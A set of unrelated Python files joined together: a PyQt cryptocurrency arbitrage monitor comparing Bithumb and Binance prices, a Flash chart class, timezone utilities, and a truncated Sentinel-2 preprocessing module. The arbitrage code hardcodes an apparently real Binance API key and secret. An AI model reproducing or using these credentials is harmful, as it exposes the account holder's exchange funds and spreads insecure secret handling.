'ETH_Ratio' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # ETH_Ratio["EOS"] = Cur_Price["ETH"] / Cur_Price["EOS"]
'Coin_Cnt' : { "ETH" : 1, "EOS" : 11806, "ETC" : 1000, "LTC" : 1000, "DASH" : 1000, "XRP" : 1000, "XMR" : 1000, "QTUM" : 1000, "ZEC" : 1000 }, # User Input Value
'ETH_Cnt' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # ETH_Cnt["EOS"] = Coint_Cnt["EOS"] * (1/ETH_Ratio["EOS"])
'Result_Cnt' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, #이동후 변환개수 : Result_Cnt["EOS"] = Dest(ETH_Ratio["EOS"]) * Dest(ETH_Cnt["EOS"])
'Profit_Cnt' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, #손익판단 : Profit_Cnt["EOS"] = Result_Cnt["EOS"] - Conie_Cnt["EOS"]
};
infoB = {
'Exchange' : "----", # User Input Value
'Cur_Price' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # Get Price valule from Server Api
'ETH_Ratio' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # ETH_Ratio["EOS"] = Cur_Price["ETH"] / Cur_Price["EOS"]
'Coin_Cnt' : { "ETH" : 1, "EOS" : 11806, "ETC" : 1000, "LTC" : 1000, "DASH" : 1000, "XRP" : 1000, "XMR" : 1000, "QTUM" : 1000, "ZEC" : 1000 }, # User Input Value
'ETH_Cnt' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, # ETH_Cnt["EOS"] = Coint_Cnt["EOS"] * (1/ETH_Ratio["EOS"])
'Result_Cnt' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, #이동후 변환개수 : Result_Cnt["EOS"] = Dest(ETH_Ratio["EOS"]) * Dest(ETH_Cnt["EOS"])
'Profit_Cnt' : { "ETH" : 1, "EOS" : 0, "ETC" : 0, "LTC" : 0, "DASH" : 0, "XRP" : 0, "XMR" : 0, "QTUM" : 0, "ZEC" : 0 }, #손익판단 : Profit_Cnt["EOS"] = Result_Cnt["EOS"] - Conie_Cnt["EOS"]
};
form_class = uic.loadUiType("./QtUI/Coin.ui")[0];
#class MyWindow(QMainWindow):
class MyWindow(QMainWindow, form_class) :
def __init__(self):
super().__init__();
self.setWindowTitle("Coin Master");
self.setupUi(self);
self.exchg = Exchange();
self.myEOSCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["EOS"]));
self.myLTCCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["LTC"]));
self.myXMRCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["XMR"]));
self.myXRPCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["XRP"]));
self.myZECCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["ZEC"]));
self.myQTUMCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["QTUM"]));
self.myETCCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["ETC"]));
self.myDASHCnt.setText(str(self.exchg.infoA["Coin_Cnt"]["DASH"]));
self.myEOSCnt.textChanged.connect(self.setMyEOSCnt);
self.myLTCCnt.textChanged.connect(self.setMyLTCCnt);
self.myXMRCnt.textChanged.connect(self.setMyXMRCnt);
self.myXRPCnt.textChanged.connect(self.setMyXRPCnt);
self.myZECCnt.textChanged.connect(self.setMyZECCnt);
self.myQTUMCnt.textChanged.connect(self.setMyQTUMCnt);
self.myETCCnt.textChanged.connect(self.setMyETCCnt);
self.myDASHCnt.textChanged.connect(self.setMyDASHCnt);
self.coin_timer_start();
self.get_curtime_start();
def setMyEOSCnt(self):
data = self.myEOSCnt.text();
if(data == ""):
self.exchg.infoA["Coin_Cnt"]["EOS"] = 1;
else:
self.exchg.infoA["Coin_Cnt"]["EOS"] = int(data);
print("setMyEOSCnt= ", self.myEOSCnt.text());
pass
def setMyLTCCnt(self):
data = self.myLTCCnt.text();
if(data == ""):
self.exchg.infoA["Coin_Cnt"]["LTC"] = 1;
else:
self.exchg.infoA["Coin_Cnt"]["LTC"] = int(data);
print("setMyLTCCnt= ", self.myLTCCnt.text());
pass
def setMyXMRCnt(self):
data = self.myXMRCnt.text();
if(data == ""):
self.exchg.infoA["Coin_Cnt"]["XMR"] = 1;
else:
self.exchg.infoA["Coin_Cnt"]["XMR"] = int(data);
print("setMyXMRCnt= ", self.myXMRCnt.text());
pass
def setMyXRPCnt(self):
data = self.myXRPCnt.text();
if(data == ""):
self.exchg.infoA["Coin_Cnt"]["XRP"] = 1;
else:
self.exchg.infoA["Coin_Cnt"]["XRP"] = int(data);
print("setMyXRPCnt= ", self.myXRPCnt.text());
pass
def setMyZECCnt(self):
data = self.myZECCnt.text();
if(data == ""):
self.exchg.infoA["Coin_Cnt"]["ZEC"] = 1;
else:
self.exchg.infoA["Coin_Cnt"]["ZEC"] = int(data);
print("setMyZECCnt= ", self.myZECCnt.text());
pass
def setMyQTUMCnt(self):
data = self.myQTUMCnt.text();
if(data == ""):
self.exchg.infoA["Coin_Cnt"]["QTUM"] = 1;
else:
self.exchg.infoA["Coin_Cnt"]["QTUM"] = int(data);
print("setMyQTUMCnt= ", self.myQTUMCnt.text());
pass
def setMyDASHCnt(self):
data = self.myDASHCnt.text();
if(data == ""):
self.exchg.infoA["Coin_Cnt"]["DASH"] = 1;
else:
self.exchg.infoA["Coin_Cnt"]["DASH"] = int(data);
print("setMyDASHCnt= ", self.myDASHCnt.text());
pass
def setMyETCCnt(self):
data = self.myETCCnt.text();
if(data == ""):
self.exchg.infoA["Coin_Cnt"]["ETC"] = 1;
else:
self.exchg.infoA["Coin_Cnt"]["ETC"] = int(data);
print("setMyETCCnt= ", self.myETCCnt.text());
pass
def getConnection(self, kindofexchange):
client = 0;
if(kindofexchange == "Bithumb") :
#print("\ngetConnection : Bithumb");
api_key = "api_connect_key";
api_secret = "api_secret_key";
client = XCoinAPI(api_key, api_secret);
return client;
elif (kindofexchange == "Binance") :
#print("\ngetConnection : Binance");
api_key = "AD0eZpGTPLSsmmVKNaQfmcF84SeimFX884i5hkz4ESHse4IG93KVTmpN5Zn5Rw996";
api_secret = "Ao1CShHsHxVzzPmGH1mxRrG9Pw4rcXoTKNM9sxG9KKMWDBe3yRNzArKFbOxYGPU7j";
client = Client(api_key, api_secret)
return client;
else :
print("getConnection : none");
def getCryptoCurrencyPrice(self, connection, kindofexchange, kindofcoine):
if(kindofexchange == "Bithumb") :
#print("Bithumb Price of " + kindofcoine + "\n");
bithumb_rgParams["order_currency"] = kindofcoine;
#print(bithumb_rgParams);
coin = "/public/ticker/" + kindofcoine;
#coin = "/public/ticker/all";
#print("Bithumb Price of " + bithumb_rgParams["order_currency"]);
ret = connection.xcoinApiCall(coin, bithumb_rgParams);
elif (kindofexchange == "Binance") :
#print("get_orderbook_ticker\n");
ret = connection.get_orderbook_ticker(symbol=kindofcoine);
else:
ret = 0;
return ret;
def coin_pricecheck(self):
# get coin price from Binance Exchange
bApi = self.getConnection("Binance");
self.exchg.infoB["Exchange"] = "Binance";
index = 0;
for i in coin_binance:
result = self.getCryptoCurrencyPrice(bApi, "Binance", i);
j = coin_map[i];
index += 1;
#print("coin/eth = ", j + "--> sell: " + result["bidPrice"]);
if(j == "ETH") :
self.exchg.infoB["Cur_Price"][j] = float(result["bidPrice"]);
self.exchg.infoB["ETH_Ratio"][j] = 1;
else :
self.exchg.infoB["Cur_Price"][j] = float(self.exchg.infoB["Cur_Price"]["ETH"]) * float(result["bidPrice"]);
self.exchg.infoB["ETH_Ratio"][j] = float(result["bidPrice"]);
self.exchg.infoB["ETH_Cnt"][j] = self.exchg.infoB["Coin_Cnt"][j] * self.exchg.infoB["ETH_Ratio"][j];
# get coin price from Bithumb Exchange
aApi = self.getConnection("Bithumb");
self.exchg.infoA["Exchange"] = "Bithumb";
for i in coin:
result = self.getCryptoCurrencyPrice(aApi, "Bithumb", i);
if(result["status"] == "0000"):
#print("coin = ", i + "--> sell: " + result["data"]["sell_price"]);
self.exchg.infoA["Cur_Price"][i] = float(result["data"]["sell_price"]);
if(i == "ETH") :
self.exchg.infoA["ETH_Ratio"][i] = 1;
continue
else :
self.exchg.infoA["ETH_Ratio"][i] = float(self.exchg.infoA["Cur_Price"][i]) / float(self.exchg.infoA["Cur_Price"]["ETH"]);
self.exchg.infoA["ETH_Cnt"][i] = self.exchg.infoA["Coin_Cnt"][i] * self.exchg.infoA["ETH_Ratio"][i];
# Calculate Transfer profit
for i in coin:
if(i == "ETH") :
self.exchg.infoA["Result_Cnt"][i] = 1;
else :
self.exchg.infoA["Result_Cnt"][i] = (self.exchg.infoA["ETH_Cnt"][i] * 0.995) / self.exchg.infoB["ETH_Ratio"][i];
self.exchg.infoA["Profit_Cnt"][i] = self.exchg.infoA["Result_Cnt"][i] - self.exchg.infoA["Coin_Cnt"][i];
index = 0;
for i in coin_binance:
j = coin_map[i];
index += 1;
if(j == "ETH") :
self.exchg.infoB["Result_Cnt"][j] = 1;
else :
self.exchg.infoB["Result_Cnt"][j] = (self.exchg.infoB["ETH_Cnt"][j] * 0.995) / self.exchg.infoA["ETH_Ratio"][j];
self.exchg.infoB["Profit_Cnt"][j] = self.exchg.infoB["Result_Cnt"][j] - self.exchg.infoB["Coin_Cnt"][j];
print("==================================");
print("Bithumb --> Binance : ", self.exchg.infoA["Profit_Cnt"]["EOS"]);
print("Binance --> Bithumb : ", self.exchg.infoB["Profit_Cnt"]["EOS"]);
print("==================================");
self.coinview_Update();
pass
def coinview_Update(self):
print("Call coinview_Update");
# 재정거래 예상 이익
self.EOS_Diff.display(self.exchg.infoA["Profit_Cnt"]["EOS"]);
self.ETC_Diff.display(self.exchg.infoA["Profit_Cnt"]["ETC"]);
self.LTC_Diff.display(self.exchg.infoA["Profit_Cnt"]["LTC"]);
self.XMR_Diff.display(self.exchg.infoA["Profit_Cnt"]["XMR"]);
self.QTUM_Diff.display(self.exchg.infoA["Profit_Cnt"]["QTUM"]);
self.ZEC_Diff.display(self.exchg.infoA["Profit_Cnt"]["ZEC"]);
self.XRP_Diff.display(self.exchg.infoA["Profit_Cnt"]["XRP"]);
self.DASH_Diff.display(self.exchg.infoA["Profit_Cnt"]["DASH"]);
self.Src_ETH_Price.display(self.exchg.infoA["Cur_Price"]["ETH"]);
self.Src_EOS_Price.display(self.exchg.infoA["Cur_Price"]["EOS"]);
self.Src_ETC_Price.display(self.exchg.infoA["Cur_Price"]["ETC"]);
self.Src_LTC_Price.display(self.exchg.infoA["Cur_Price"]["LTC"]);
self.Src_XMR_Price.display(self.exchg.infoA["Cur_Price"]["XMR"]);
self.Src_QTUM_Price.display(self.exchg.infoA["Cur_Price"]["QTUM"]);
self.Src_ZEC_Price.display(self.exchg.infoA["Cur_Price"]["ZEC"]);
self.Src_XRP_Price.display(self.exchg.infoA["Cur_Price"]["XRP"]);
self.Src_DASH_Price.display(self.exchg.infoA["Cur_Price"]["DASH"]);
self.Src_EOSETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["EOS"]);
self.Src_ETCETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["ETC"]);
self.Src_LTCETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["LTC"]);
self.Src_XMRETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["XMR"]);
self.Src_QTUMETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["QTUM"]);
self.Src_ZECETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["ZEC"]);
self.Src_XRPETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["XRP"]);
self.Src_DASHETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["DASH"]);
# 재정거래 예상
self.Dst_EOS_TCnt.display(self.exchg.infoA["Result_Cnt"]["EOS"]);
self.Dst_ETC_TCnt.display(self.exchg.infoA["Result_Cnt"]["ETC"]);
self.Dst_LTC_TCnt.display(self.exchg.infoA["Result_Cnt"]["LTC"]);
self.Dst_XMR_TCnt.display(self.exchg.infoA["Result_Cnt"]["XMR"]);
self.Dst_QTUM_TCnt.display(self.exchg.infoA["Result_Cnt"]["QTUM"]);
self.Dst_ZEC_TCnt.display(self.exchg.infoA["Result_Cnt"]["ZEC"]);
self.Dst_XRP_TCnt.display(self.exchg.infoA["Result_Cnt"]["XRP"]);
self.Dst_DASH_TCnt.display(self.exchg.infoA["Result_Cnt"]["DASH"]);
# 재정거래 예상 이익
self.EOS_PRatio.display(self.exchg.infoA["Profit_Cnt"]["EOS"]*100/self.exchg.infoA["Coin_Cnt"]["EOS"]);
self.ETC_PRatio.display(self.exchg.infoA["Profit_Cnt"]["ETC"]*100/self.exchg.infoA["Coin_Cnt"]["ETC"]);
self.LTC_PRatio.display(self.exchg.infoA["Profit_Cnt"]["LTC"]*100/self.exchg.infoA["Coin_Cnt"]["LTC"]);
self.XMR_PRatio.display(self.exchg.infoA["Profit_Cnt"]["XMR"]*100/self.exchg.infoA["Coin_Cnt"]["XMR"]);
self.QTUM_PRatio.display(self.exchg.infoA["Profit_Cnt"]["QTUM"]*100/self.exchg.infoA["Coin_Cnt"]["QTUM"]);
self.ZEC_PRatio.display(self.exchg.infoA["Profit_Cnt"]["ZEC"]*100/self.exchg.infoA["Coin_Cnt"]["ZEC"]);
self.XRP_PRatio.display(self.exchg.infoA["Profit_Cnt"]["XRP"]*100/self.exchg.infoA["Coin_Cnt"]["XRP"]);
self.DASH_PRatio.display(self.exchg.infoA["Profit_Cnt"]["DASH"]*100/self.exchg.infoA["Coin_Cnt"]["DASH"]);
self.Dst_ETH_Price.display(self.exchg.infoB["Cur_Price"]["ETH"]);
self.Dst_EOS_Price.display(self.exchg.infoB["Cur_Price"]["EOS"]);
self.Dst_ETC_Price.display(self.exchg.infoB["Cur_Price"]["ETC"]);
self.Dst_LTC_Price.display(self.exchg.infoB["Cur_Price"]["LTC"]);
self.Dst_XMR_Price.display(self.exchg.infoB["Cur_Price"]["XMR"]);
self.Dst_QTUM_Price.display(self.exchg.infoB["Cur_Price"]["QTUM"]);
self.Dst_ZEC_Price.display(self.exchg.infoB["Cur_Price"]["ZEC"]);
self.Dst_XRP_Price.display(self.exchg.infoB["Cur_Price"]["XRP"]);
self.Dst_DASH_Price.display(self.exchg.infoB["Cur_Price"]["DASH"]);
self.Dst_EOSETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["EOS"]);
self.Dst_ETCETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["ETC"]);
self.Dst_LTCETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["LTC"]);
self.Dst_XMRETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["XMR"]);
self.Dst_QTUMETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["QTUM"]);
self.Dst_ZECETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["ZEC"]);
self.Dst_XRPETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["XRP"]);
self.Dst_DASHETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["DASH"]);
def coin_timer(self, mode, count, period):
#print("Timer option is " + str(mode) + "Period = " + str(period));
if(mode == "oneshot"):
self.coin_pricecheck();
elif (mode == "refresh"):
i = 0;
while i < count:
#print("Timer Call = ", i);
self.coin_pricecheck();
time.sleep(period);
i += 1;
elif (mode == "infinite"):
while True:
self.coin_pricecheck();
time.sleep(period);
else:
print("Timer option error\n");
def coin_timer_start(self):
#threading.Timer(delay, 함수, args=[매개변수,]) - delay초 후에 함수실행
#timer2 = threading.Timer(10, self.coin_timer, args=['infinite', 5, 10]);
self.timer = threading.Timer(1, self.coin_timer, args=['infinite', 5, 10]);
self.timer.start();
def get_curtime_timer(self, period):
while True:
myTime = time.strftime('%H:%M:%S');
#print(myTime);
self.cur_time.setText(str(myTime));
time.sleep(period);
def get_curtime_start(self):
#threading.Timer(delay, 함수, args=[매개변수,]) - delay초 후에 함수실행
#timer2 = threading.Timer(10, self.coin_timer, args=['infinite', 5, 10]);
self.timetimer = threading.Timer(1, self.get_curtime_timer, args=[1]);
self.timetimer.start();
if __name__ == "__main__":
app = QApplication(sys.argv);
myWindow = MyWindow();
myWindow.show();
app.exec_();
# Timer 10 sec
#timer = threading.Thread(name='time', target=coin_timer, args=('infinite', 5, 30));
#timer.start();
#https://api.binance.com/api//ticker/bookTicker
#https://api.binance.com/api/v1/ticker/24hr
'''
# Create Thread
def theradfunc(param1, param2):
print("==================================");
print("threadfunc create = ", param1, param2);
print("==================================");
pass
jobb = threading.Thread(name="jobb", target=theradfunc, args=(1, 100000));
jobb.start();
class bithumb:
urlTicker = urllib.request.urlopen('https://api.bithumb.com/public/ticker/all')
headers = { 'User-Agent' : 'Mozilla/5.0' }
readTicker = urlTicker.read()
jsonTicker = json.loads(readTicker)
FindBTC = jsonTicker['data']['BTC']['sell_price']
BTC = int(FindBTC)
FindETH = jsonTicker['data']['ETH']['sell_price']
ETH = int(FindETH)
FindDASH = jsonTicker['data']['DASH']['sell_price']
DASH = int(FindDASH)
FindLTC = jsonTicker['data']['LTC']['sell_price']
LTC = int(FindLTC)
FindETC = jsonTicker['data']['ETC']['sell_price']
ETC = int(FindETC)
FindXRP = jsonTicker['data']['XRP']['sell_price']
XRP = int(FindXRP)
if(result["status"] == "0000"):
#print(result);
print("status: " + result["status"]);
print("sell: " + result["data"]["sell_price"]);
print("buy: " + result["data"]["buy_price"]);
exchg = Exchange();
exchg.infoA["Exchange"] = "Bithumb";
exchg.infoB["Exchange"] = "Binance";
print(exchg.infoA);
print(exchg.infoB);
#print("Binance Price of " + kindofcoine + "\n");
#ret = connection.get_all_orders(symbol='BNBBTC', requests_params={'timeout': 5});
#print(ret);
#ret = connection.get_symbol_info('EOSETH');
#print(ret);
print("get_all_tickers\n");
ret = connection.get_all_tickers();
print(ret);
print("\n");
print("get_symbol_ticker\n");
ret = connection.get_symbol_ticker(symbol='EOSETH');
print(ret);
print("\n");
#ret = connection.get_exchange_info();
#print(ret);
print("\n");
'''
|
class Graph:
def __init__(self):
self.data = []
self.x_labels = []
self.y_min = 0
self.y_max = 20
self.y_steps = 5
self.title_text = ''
self.title_size = 30
self.pie = 0
self.x_tick_size = -1
# GRID styles:
self.x_axis_colour = ''
self.x_grid_colour = ''
self.y_axis_colour = ''
self.y_grid_colour = ''
self.x_axis_steps = 1
# AXIS LABEL styles:
self.x_label_style_size = -1
self.x_label_style_colour = '#000000'
self.x_label_style_orientation = 0
self.x_label_style_step = 1
self.y_label_style_size = -1
self.y_label_style_colour = '#000000'
# AXIS LEGEND styles:
self.x_legend = ''
self.x_legend_size = 20
self.x_legend_colour = '#000000'
self.y_legend = ''
self.y_legend_size = 20
self.y_legend_colour = '#000000'
self.lines = []
self.line_default = '&line=3,#87421F&' + "\r\n"
self.bg_colour = ''
self.bg_image = ''
self.inner_bg_colour = ''
self.inner_bg_colour_2 = ''
self.inner_bg_angle = ''
def set_data( self, a ):
if( len( self.data ) == 0 ):
self.data.append( '&values=%s&\r\n' % ','.join([str(v) for v in a]) )
else:
self.data.append( '&values_%s=%s&\r\n' % (len(self.data)+1, ','.join([str(v) for v in a])) )
def set_x_labels( self, a ):
self.x_labels = a
def set_x_label_style( self, size, colour='', orientation=0, step=-1 ):
self.x_label_style_size = size
if( len( colour ) > 0 ):
self.x_label_style_colour = colour
if( orientation > 0 ):
self.x_label_style_orientation = orientation
if( step > 0 ):
self.x_label_style_step = step
def set_bg_colour( self, colour ):
self.bg_colour = colour
def set_bg_image( self, url, x='center', y='center' ):
self.bg_image = url
self.bg_image_x = x
self.bg_image_y = y
def set_inner_background( self, col, col2='', angle=-1 ):
self.inner_bg_colour = col
if( len(col2) > 0 ):
self.inner_bg_colour_2 = col2
if( angle != -1 ):
self.inner_bg_angle = angle
def set_y_label_style( self, size, colour='' ):
self.y_label_style_size = size
if( len( colour ) > 0 ):
self.y_label_style_colour = colour
def set_y_max( self, max ):
self.y_max = int( max )
def set_y_min( self, min ):
self.y_min = int( min )
def y_label_steps( self, val ):
self.y_steps = int( val )
def title( self, title, size=-1, colour='#000000' ):
self.title_text = title
if( size > 0 ):
self.title_size = size
if( len( colour ) > 0 ):
self.title_colour = colour
def set_x_legend( self, text, size=-1, colour='' ):
self.x_legend = text
if( size > -1 ):
self.x_legend_size = size
if( len( colour )>0 ):
self.x_legend_colour = colour
def set_x_tick_size( self, size ):
if( size > 0 ):
self.x_tick_size = size
def set_x_axis_steps( self, steps ):
if ( steps > 0 ):
self.x_axis_steps = steps
def set_y_legend( self, text, size=-1, colour='' ):
self.y_legend = text
if( size > -1 ):
self.y_legend_size = size
if( len( colour )>0 ):
self.y_legend_colour = colour
def line( self, width, colour='', text='', size=-1, circles=-1 ):
tmp = '&line'
if( len( self.lines ) > 0 ):
tmp += '_%s' % (len( self.lines )+1)
tmp += '='
if( width > 0 ):
tmp += "%s,%s" % (width, colour)
if( len( text ) > 0 ):
tmp += ',%s,%s' % (text,size)
if( circles > 0 ):
tmp += ',%s' % circles
tmp += "&\r\n"
self.lines.append( tmp )
def line_dot( self, width, dot_size, colour, text='', font_size=0 ):
tmp = '&line_dot'
if( len( self.lines ) > 0 ):
tmp += '_%s' % (len( self.lines )+1)
tmp += "=%s,%s,%s" % (width,colour,text)
if( font_size > 0 ):
tmp += ",%s,%s" % (font_size,dot_size)
tmp += "&\r\n"
self.lines.append( tmp )
def line_hollow( self, width, dot_size, colour, text='', font_size=0 ):
tmp = '&line_hollow'
if( len( self.lines ) > 0 ):
tmp += '_%s' % (len( self.lines )+1)
tmp += "=%s,%s,%s" % (width,colour,text)
if( font_size > 0 ):
tmp += ",%s,%s" % (font_size,dot_size)
tmp += "&\r\n"
self.lines.append( tmp )
def area_hollow( self, width, dot_size, colour, alpha, text='', font_size=0, fill_color='' ):
tmp = '&area_hollow'
if( len( self.lines ) > 0 ):
tmp += '_%s' % (len( self.lines )+1)
tmp += "=%s,%s,%s,%s" % (width,dot_size,colour,alpha)
if( len( text ) > 0 ):
tmp += ",%s,%s" % (text,font_size)
if( len( fill_color ) > 0 ):
tmp += ",%s" % (fill_color)
tmp += "&\r\n"
self.lines.append( tmp )
def bar( self, alpha, colour='', text='', size=-1 ):
tmp = '&bar'
if( len( self.lines ) > 0 ):
tmp += '_%s' % (len( self.lines )+1)
tmp += '='
tmp += "%s,%s,%s,%s" % (alpha,colour,text,size)
tmp += "&\r\n"
self.lines.append( tmp )
def bar_glass( self, alpha, colour, outline_colour, text='', size=-1 ):
tmp = '&bar_glass';
if( len( self.lines ) > 0 ):
tmp += '_%s' % (len( self.lines )+1)
tmp += '='
tmp += "%s,%s,%s,%s,%s" % (alpha,colour,outline_colour,text,size)
tmp += "&"
self.lines.append( tmp )
def bar_filled( self, alpha, colour, colour_outline, text='', size=-1 ):
tmp = '&filled_bar'
if( len( self.lines ) > 0 ):
tmp += '_%s' % (len( self.lines )+1)
tmp += "=%s,%s,%s,%s,%s&\r\n" % (alpha,colour,colour_outline,text,size)
self.lines.append( tmp )
def fx_axis_colour( self, axis, grid='' ):
self.x_axis_colour = axis
self.x_grid_colour = grid
def fy_axis_colour( self, axis, grid='' ):
self.y_axis_colour = axis
self.y_grid_colour = grid
def pie(self, alpha, line_colour, label_colour ):
self.pie = str(alpha) + ',' + line_colour + ',' + label_colour
def pie_values(self, values, labels):
self.pie_values = ','.join([str(v) for v in values])
self.pie_labels = ','.join([str(v) for v in labels])
def pie_slice_colours(self, colours):
self.pie_colours = ','.join([str(v) for v in colours])
def set_tool_tip(self, tip):
self.tool_tip = tip
def render( self,):
#tmp = "&padding=70,5,50,40&\r\n"
tmp = ''
if( len( self.title_text ) > 0 ):
tmp += '&title=%s,%s,%s&\r\n' % (self.title_text,self.title_size,self.title_colour)
if( len( self.x_legend ) > 0 ):
tmp += '&x_legend=%s,%s,%s\r\n' % (self.x_legend,self.x_legend_size,self.x_legend_colour)
if( self.x_label_style_size > 0 ):
tmp += '&x_label_style=%s,%s,%s,%s&\r\n' % (self.x_label_style_size,self.x_label_style_colour,self.x_label_style_orientation,self.x_label_style_step)
if( self.x_tick_size > 0 ):
tmp += "&x_ticks=%s&\r\n" % self.x_tick_size
if( self.x_axis_steps > 0 ):
tmp += "&x_axis_steps=%s&\r\n" % self.x_axis_steps
if( len( self.y_legend ) > 0 ):
tmp += '&y_legend=%s,%s,%s&\r\n' % (self.y_legend,self.y_legend_size,self.y_legend_colour)
if( self.y_label_style_size > 0 ):
tmp += "&y_label_style=%s,%s&\r\n" % (self.y_label_style_size,self.y_label_style_colour)
tmp += '&y_ticks=5,10,%s&\r\n' % self.y_steps
if( len( self.lines ) == 0 ):
tmp += self.line_default
else:
for line in self.lines:
tmp += line
for data in self.data:
tmp += data
if( len( self.x_labels ) > 0 ):
tmp += '&x_labels=%s&\r\n' % ",".join(self.x_labels)
tmp += '&y_min=%s&\r\n' % self.y_min
tmp += '&y_max=%s&\r\n' % self.y_max
if( len( self.bg_colour ) > 0 ):
tmp += '&bg_colour=%s&\r\n' % self.bg_colour
if( len( self.bg_image ) > 0 ):
tmp += '&bg_image=%s&\r\n' % self.bg_image
tmp += '&bg_image_x=%s&\r\n' % self.bg_image_x
tmp += '&bg_image_y=%s&\r\n' % self.bg_image_y
if( len( self.x_axis_colour ) > 0 ):
tmp += '&x_axis_colour=%s&\r\n' % self.x_axis_colour
tmp += '&x_grid_colour=%s&\r\n' % self.x_grid_colour
if( len( self.y_axis_colour ) > 0 ):
tmp += '&y_axis_colour=%s&\r\n' % self.y_axis_colour
tmp += '&y_grid_colour=%s&\r\n' % self.y_grid_colour
if( len( self.inner_bg_colour ) > 0 ):
tmp += '&inner_background=%s' % self.inner_bg_colour
if( len( self.inner_bg_colour_2 ) > 0 ):
tmp += ',%s,%s' % ( self.inner_bg_colour_2, self.inner_bg_angle )
tmp += "&\r\n"
if( self.pie != 0 and len(self.pie) > 0 ):
tmp += '&pie=' + self.pie + '&'
tmp += '&values=' + self.pie_values + '&'
tmp += '&pie_labels=' + self.pie_labels + '&'
tmp += '&colours=' + self.pie_colours + '&'
return tmp
|
import datetime
import pytz
from dateutil import relativedelta
UTC_TZ = pytz.timezone('UTC')
EASTERN_TZ = pytz.timezone('US/Eastern')
# Timezones are way harder than one would imagine.
# from betterself.utils import date_utils
def get_datetime_in_eastern_timezone(year, month, day, hour, minute, second=0):
""" Don't judge me, I use this a lot for debugging my timezone thoughts """
eastern_datetime = datetime.datetime(year, month, day, hour, minute, second, tzinfo=EASTERN_TZ)
return eastern_datetime
def get_current_utc_time_and_tz():
"""
For the love of god, I can never remember if this includes the timezone or not
This includes it.
"""
return datetime.datetime.now(pytz.UTC)
def get_current_usertime(user):
return datetime.datetime.now(user.pytz_timezone)
def get_current_userdate(user):
return get_current_usertime(user).date()
def days_ago_from_current_day(days):
now = datetime.datetime.utcnow()
# make sure the timezone is added to the datetime, otherwise many warnings
now = UTC_TZ.localize(now)
date_days_ago = now - relativedelta.relativedelta(days=days)
return date_days_ago
def get_current_date_months_ago(months):
today = datetime.date.today()
return today - relativedelta.relativedelta(months=months)
def get_current_date_years_ago(years):
today = datetime.date.today()
return today - relativedelta.relativedelta(years=years)
def get_current_date_days_ago(days_ago):
today = datetime.date.today()
return today - relativedelta.relativedelta(days=days_ago)
def get_midnight_datetime_from_date_parameter(user, date):
# for a date, transform it into a datetime object at midnight
time_serialized = datetime.datetime.combine(date, datetime.datetime.min.time())
return user.pytz_timezone.localize(time_serialized)
|
# coding: utf-8
"""
Main functions to preprocess Sentinel-2 Datasets for Change Detection purpose
@Author: Tony Di Pilato
Created on Wed Feb 19, 2020
"""
import os
import numpy as np
from osgeo import osr
from osgeo import gdal
import random
def build_raster(folder, channels):
filenames = {3:['B02','B03','B04'], # RGB
4: ['B02','B03','B04', 'B08'], # 10m resolution
7: ['B01','B02','B03','B04', 'B08', 'B09', 'B10'], #10m + 60m resolution
10: ['B02','B03','B04', 'B05', 'B06', 'B07', 'B08', 'B8A', 'B11','B12'], #10m + 20m resolution
13: ['B01','B02','B03','B04','B05','B06','B07','B08','B8A','B09','B10','B11','B12']} # full raster
bands = [gdal.Open(folder + f + '.tif').ReadAsArray() for f in filenames[channels]]
raster = np.stack(bands, axis=2)
return raster
def build_raster_fromMultispectral(dataset, channels):
band_num = {3:[2,3,4], # RGB
4: [2,3,4,8], # 10m resolution
7: [1,2,3,4,8,10,11], #10m + 60m resolution
10: [2,3,4,5,6,7,8,9,12,13], #10m + 20m resolution
13: [1,2,3,4,5,6,7,8,9,10,11,12,13]}
bands = [dataset.GetRasterBand(b).ReadAsArray() for b in band_num[channels]]
raster = np.stack(bands, axis = 2)
return raster
def pad(img, crop_size):
h, w, c = img.shape
n_h = int(h/crop_size)
n_w = int(w/crop_size)
w_toadd = (n_w+1) * crop_size - w
h_toadd = (n_h+1) * crop_size - h
